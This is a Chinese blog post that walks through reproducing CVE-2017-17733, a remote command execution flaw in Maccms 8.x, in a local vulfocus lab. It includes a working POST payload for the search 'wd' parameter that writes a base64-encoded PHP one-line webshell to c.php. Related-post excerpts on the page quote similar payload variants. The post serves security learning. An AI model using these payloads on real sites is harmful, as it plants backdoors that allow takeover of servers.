maccms-cve_2017_17733漏洞复现

最新推荐文章于 2024-02-26 16:18:27 发布
最新推荐文章于 2024-02-26 16:18:27 发布
阅读量3.9k 收藏 1
点赞数
分类专栏: 渗透测试实验 文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51459600/article/details/123225586
版权

maccms-cve_2017_17733

Maccms是一套跨平台的基于PHP和MySQL快速建站系统。 Maccms 8.x版本中存在安全漏洞。远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。

环境搭建

靶机:CentOS7(192.168.2.110)

利用本地vulfocus平台一键搭建maccms环境:

环境搭建完成


漏洞利用

访问http://192.168.2.110:59973/index.php?m=vod-search

post提交payload:

wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

payload上床了一句话木马c.php,连接密码为c

执行上传后用yijian连接:


漏洞原理

参考:

(134条消息) 眉间雪之maccms8.x版RCE代码审计_CSDNPM250的博客-CSDN博客_苹果cms代码审计

Hummer-200
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
xray扫描器的使用 (长亭科技公司创造)
yyj1781572的博客
11-27 8502
xray扫描器的使用 xray是一款可以使用HTTP/HTTPS代理进行被动扫描的安全工具
Maccms命令执行(CVE-2017-17733)
最新发布
m0_65150886的博客
02-26 294
远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。2.通过火狐浏览器访问http://ip:port/index.php?Maccms是一套跨平台的基于PHP和MySQL快速建站系统。1.访问http://ip:port,出如下页面,开始实验。url地址:http://ip:port/c.php。Maccms 8.x版本中存在。3.蚁剑连接,getshell。
如何使用php判断远程图片文件是否存在
徊忆羽菲
07-03 364
使用php判断远程图片文件是否存在fopen()方法mode 参数的可能的值 fopen()方法 看看文件能否打开,能打就文件当然就存在 <?php $url = 'http://www.qipa250.com/images/qipa250.jpg'; if( @fopen( $url, 'r' ) ) { echo 'File Exits'; } else { echo 'File Do Not Exits'; } ?> 语法:fopen(filename,mode
temp
ShadowAssassin的专栏
02-28 947
Post Url:/index.php?m=vod-search&amp;wd={{page:lang}if-A:e{page:lang}val{page:lang}($_PO{page:lang}ST[hxg])}{endif-A}Post Data:hxg=phpinfo().fputs(fopen('hxgs.php','w'),'&lt;?php $a=range(1,200);$b=ch...
漏洞】六、maccms 远程命令执行(CVE-2017-17733)
weixin_52351575的博客
09-21 502
这个马子进行了编码绕过,通过base64编码写入一句话木马
maccms 远程命令执行(CVE-2017-17733)
weixin_63124284的博客
10-28 780
完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。该漏洞主要的产生原因是CMS搜索页面搜索参数过滤不严导致直接eval执行PHP语句。
vulfocus——maccms远程命令执行(CVE-2017-17733)
m0_62063669的博客
09-12 1306
Maccms 8.x版本中存在安全漏洞。远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。2.借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。利用浏览器浏览器发送POST数据包或直接使用Python编写的脚本进行发送POST数据包。3.进行攻击,该payload是直接生成一个c.php一句话木马文件,连接密码为c。Maccms是一套跨平台的基于PHP和MySQL快速建站系统。
苹果CMS漏洞
热门推荐
Grey的博客
07-11 1万+
1.环境搭建: 最新版本好像修了这个漏洞 后来看大佬们分析是加了360safe、把他注释掉就可以了 审计过程:   首先在maccms8_mfb\inc\module\vod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be(“all”, “wd”)获取请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。 ...
苹果cms8.x 命令执行漏洞本地攻击演示
qq_42383069的博客
11-01 4606
新出道信息安全爱好者,有很多需要学习的地方,愿有一天能追上大佬步伐。 好了,下面进入正题,上半年6月份参加了铁人三项赛,线下web题为Maccms8.x ,当时也是通过团队协作以及百度资源成功破解服务器,在我搭建了靶机,具体步骤写出来。 1.准备:phpstudy+Maccms8.x 源码 搭建成功后我们先来访问一下 因为Maccms8.x 存在命令执行漏洞,所以我们先点击searc...
maccms10-master_maccms_maccms官网_maccms10_苹果_nan_
10-04
苹果官网关闭后的版本 已更新至2020.1.3日
jiutoushe.zip_maccms_maccms 模版_maccms10模板_maccms模板
09-23
maccms电影网站模板,自适应,支持pc,移动端
maccms10_maccms10_maccms分享地址_maccms10广告_
10-01
1.广告位开屏广告 1080 *1920推荐横条 1080 *360播放器 1080*660个人中心 1080*3602.注册金币、分享获得金币注册金币更改在宝塔服务器文件 /www/wwwroot/你的域名/app/cms/src/app/Model/Model_User.php 第72行 ...
016maccms_v2_0_模板_maccmsv2_maccms模板_carbonueq_超强mip模板_
10-01
针对百度熊掌seo优化过的模板,稀有资源 强烈推荐
(苹果CMS)整站程序+15套模板.zip_appcms15套模板_maccms10模板_maccms模版_苹果 CMS_苹果c
07-15
(苹果CMS)整站程序上传到服务器就可以了,还有15套模板 花了我2000大洋了
宝塔系统linux xss,宝塔漏洞 XSS窃取宝塔面板管理员漏洞 高危
weixin_28685045的博客
05-24 1256
宝塔是近几年刚崛起的一款服务器面板,深受各大站长的喜欢,windows2003 windows2008windosws 2012系统,linux centos deepin debian fedora系统都可以使用宝塔的面板来管理服务器,宝塔可以一键部署网站的环境,IIS环境搭建,Nginx环境,PHP环境搭建,apache jsp环境,mysql数据库,oracle数据库搭建,以及一键设置FTP...
内网渗透-ATT&CK靶场(一)
Yu3511606536的博客
02-26 1058
ATT&CK红日内网靶场一,打靶过程中用到了web打点,隧道代理,横向渗透
atitit.vod search doc.doc 点播系统搜索功能设计文档
attilax的专栏
11-06 1168
atitit.vod search doc.doc 点播系统搜索功能设计文档   按键的enter事件1 Left rig事件1 Up down事件2         key_events.key_search = function(e, curr){         var value = $('.searchbox .textbox').text();         xhr
Maccms8.x 命令执行分析
Matthew
05-24 6264
在很多地方看到有这个漏洞,自己学着分析一下。看到的poc如下 Url:  http://127.0.0.1/index.php?m=vod-search POST:  wd={{page:lang}if-:p{page:lang}hpinfo()}a{endif-}} 在index.php这里主要是进行模板的路由规则替换,vod-search就会拆分成vod和search,然后载入v
maccms10 采集
07-28
根据引用\[1\]中提供的信息,maccms10可以使用以下采集接口进行影视资源的采集: - 百度云资源:https://api.apibdzy.com/api.php/provide/vod/?ac=list - U酷资源-百度云资源的子站:https://api.ukuapi.com/api.php/provide/vod/at/xml/ - 麒麟资源:https://www.qilinzyz.com/api.php/provide/vod/?ac=list - 番茄资源:http://api.fqzy.cc/api.php/provide/vod/?ac=list - 红牛资源:https://www.hongniuzy1.com/inc/api.php - 无尽资源:https://api.wujinapi.com/api.php/provide/vod/?ac=list - kuaibozy资源:http://www.kuaibozy.com/api.php/provide/vod/from/kbm3u8/at/xml/ - 8090资源:http://zy.yilans.net:8090/api.php/provide/vod/?ac=list 而根据引用\[2\]中提供的信息,maccms10可以使用以下播放解析接口解析播放地址和m3u8视频: - https://cdn.zyc888.top/?url= (可能有广告) - 番茄资源:https://jiexi.8b5q.cn/player/jx.php?url= 最后,根据引用\[3\]中的建议,操作成功后,需要对分类进行绑定,以确保采集的数据与自己网站的数据有关联。 #### 引用[.reference_title] - *1* *2* [分享一些自己在用的maccms10的免费采集接口](https://blog.csdn.net/muzihuaner/article/details/124395958)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [苹果cms v10影视网站数据采集](https://blog.csdn.net/glei20/article/details/119735319)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值